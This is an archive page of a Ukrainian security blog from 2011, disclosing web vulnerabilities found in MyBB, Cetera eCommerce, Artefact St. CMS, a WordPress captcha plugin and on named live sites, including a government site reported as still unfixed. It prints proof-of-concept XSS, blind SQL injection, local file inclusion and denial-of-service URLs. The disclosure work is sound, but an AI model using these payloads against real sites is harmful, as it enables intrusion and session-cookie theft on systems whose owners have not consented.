Архів для категорії 'Уразливості'

Уразливості в MyBB

19:24 30.03.2011

10.02.2011

У січні, 03.01.2011, я знайшов Cross-Site Scripting та SQL DB Structure Extraction уразливості в форумному движку MyBB. Які я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

30.03.2011

Уразливості мають місце в скриптах search.php та private.php.

XSS:

MyBB XSS.html

MyBB XSS-2.html

SQL DB Structure Extraction:

MyBB SQL DB Structure Extraction.html

MyBB SQL DB Structure Extraction-2.html

Уразливі MyBB 1.6 та попередні версії.

Уразливість в MaxSite Anti Spam Image

23:53 29.03.2011

В проекті MoBiC я вже писав про уразливість в капчі Anti Spam Image. І 01.12.2007 я знайшов Insufficient Anti-automation уразливість в плагіні MaxSite Anti Spam Image для WordPress. Це перероблена версія оригінального Anti Spam Image (розробник вирішив ускладнити капчу, для кращого захисту від спамерів). Про що в той же день я повідомив розробнику плагіна.

Insufficient Anti-automation:

Даний капча плагін для WP вразливий до методу обходу session reusing with constant captcha (який описаний у вищенаведеному записі). Як і оригінальний Anti Spam Image, на основі якого і зроблений даний плагін.

MaxSite Anti Spam Image CAPTCHA bypass.html

Уразливість має місце на старих версіях PHP. Вона проявляється лише в PHP < 4.4.7, в яких є баг, який призводить до помилки в роботі алгоритму веб додатку, що призводить до можливості обходу капчі.

Уразливі MaxSite Anti Spam Image 0.6 та потенційно всі інші версії цього плагіна.

Добірка уразливостей

15:24 29.03.2011

В даній добірці уразливості в веб додатках:

  • HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code (деталі)
  • HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote Denial of Service (DoS), Remote Unauthorized Access (деталі)
  • SQL injection in SweetRice CMS (деталі)
  • XSS in SweetRice CMS (деталі)
  • HP Insight Software Installer for Windows, Local Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF) (деталі)
  • Reset admin password in SweetRice CMS (деталі)
  • Shell create & command execution in JAF CMS (деталі)
  • RSA, The Security Division of EMC, informs about potential security vulnerability in RSA enVision versions prior to 3.7 SP1 (деталі)
  • RFI in JAF CMS (деталі)
  • BBcode XSS in MiniBB (деталі)

Уразливості в плагінах для WordPress №41

23:51 28.03.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Sodahead Polls, Smen Social Button та Rating-Widget. Для котрих з’явилися експлоіти. Sodahead Polls - це плагін для стоворення голосувань, Smen Social Button - це плагін для голосування на сайті smen.ro, Rating-Widget - це доповнення до плагіна Comment Rating.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на bezpeka.kr.ua

15:20 28.03.2011

07.09.2010

У квітні, 18.04.2010, я знайшов Insufficient Anti-automation, Cross-Site Scripting, Denial of Service та Full path disclosure уразливості на сайті http://bezpeka.kr.ua (це онлайн магазин, що продає секюріті товари). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на citycom.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.03.2011

Insufficient Anti-automation:

http://bezpeka.kr.ua/users/register.html

На даній сторінці використовується уразлива капча. Приклад атаки показаний в експлоіті для PHPShop:

PHPShop CAPTCHA bypass.html

http://bezpeka.kr.ua/users/sendpassword.html

На даній сторінці немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://bezpeka.kr.ua/users/register.html з обходом капчі. Приклад атаки показаний в експлоіті для PHPShop:

PHPShop XSS.html

DoS:

http://bezpeka.kr.ua/search/?words=.&p=all&cat=0

Full path disclosure:

http://bezpeka.kr.ua/page/’

Дані уразливості, окрім FPD, досі не виправлені.

Нові уразливості в Cetera eCommerce

19:21 26.03.2011

28.01.2011

У грудні, 14.12.2010, я знайшов нові Cross-Site Scripting, SQL Injection та SQL DB Structure Extraction уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru (на перші дві XSS звернув мою увагу Maciej Gojny). Причому деякі уразливості стосуються як 14 версії, так і 15 версії Cetera eCommerce, що вийшла у жовтні 2010 року (і яка зараз розміщена на демо сайті).

Раніше я вже писав про уразливості в Cetera eCommerce.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

26.03.2011

XSS (також працюють в версії 15.0):

http://site/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

XSS:

http://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

Дана уразливість з’явилася в версії 15.0. Уразливість має місце на сторінці з 404 помилкою, тому вона спрацює як за цією адресою, так і за іншими адресами, що ведуть на неіснуючі сторінки.

SQL Injection (blind SQLi):

http://site/catalog/(version()=5.1)/

http://site/catalog/cart/’+benchmark(100000,md5(now()))+’/

SQL DB Structure Extraction:

http://site/catalog/%22/

http://site/catalog/cart/’/

Уразливі Cetera eCommerce 14.0 та попередні версії, а XSS уразливості також стосуються версії 15.0. Останні чотири уразливості вже виправлені в останній версії системи.

Добірка уразливостей

17:14 26.03.2011

В даній добірці уразливості в веб додатках:

  • HP Insight Orchestration for Windows, Remote Unauthorized Access (деталі)
  • HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote Execution of Arbitrary Code and Other Vulnerabilities (деталі)
  • XSS vulnerability in MemHT Portal (деталі)
  • Stored XSS (Cross Site Scripting) vulnerability in MemHT Portal (деталі)
  • HP Virtual Connect Enterprise Manager for Windows, Remote Cross Site Scripting (XSS) (деталі)
  • HP Insight Control Server Migration for Windows, Local and Remote Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS) (деталі)
  • Security Advisory for Bugzilla 3.2.8, 3.4.8, 3.6.2, and 3.7.3 (деталі)
  • Zen Cart 1.3.9h Local File Inclusion Vulnerability (деталі)
  • HP Client Automation Enterprise Infrastructure (Radia) Remote Disclosure of Information (деталі)
  • Adsoft Remote Sql Injection Vulnerability (деталі)

Уразливості на www.disperindag-jabar.go.id

15:18 25.03.2011

04.09.2010

У квітні, 16.04.2010, я знайшов Information Leakage, Local File Include та Full path disclosure уразливості на сайті http://www.disperindag-jabar.go.id. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

25.03.2011

Information Leakage (Forced Directory Indexing):

http://www.disperindag-jabar.go.id/%3f/

Дану уразливість я назвав Forced Directory Indexing і вона може мати місце зокрема на веб сервері Apache.

Local File Include:

http://www.disperindag-jabar.go.id/?pilih=index

http://www.disperindag-jabar.go.id/?pilih=files/../index

Full path disclosure:

http://www.disperindag-jabar.go.id/?pilih=index

http://www.disperindag-jabar.go.id/?pilih=config

Дані уразливості досі не виправлені.

Уразливості в плагінах для WordPress №40

23:58 24.03.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Lazyest Gallery та Sodahead Polls. Для котрих з’явилися експлоіти. Lazyest Gallery - це плагін для стоворення фото галерей, Sodahead Polls - це плагін для стоворення голосувань.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості в Artefact St. CMS

15:14 24.03.2011

26.01.2011

У грудні, 14.12.2010, я знайшов Cross-Site Scripting, Brute Force та Full path disclosure уразливості в Artefact St. CMS (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

Дірки я виявив на http://www.moral.gov.ua, про дірки на якому (в попередньому движку) я вже писав, та на інших сайтах, що використвують даний движок.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб системи.

24.03.2011

XSS:

http://site/search/?s=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Brute Force:

http://site/admin/

Full path disclosure:

http://site/view.php?id=

Уразливі всі версії Artefact St. CMS та Artefact St. CMS light version.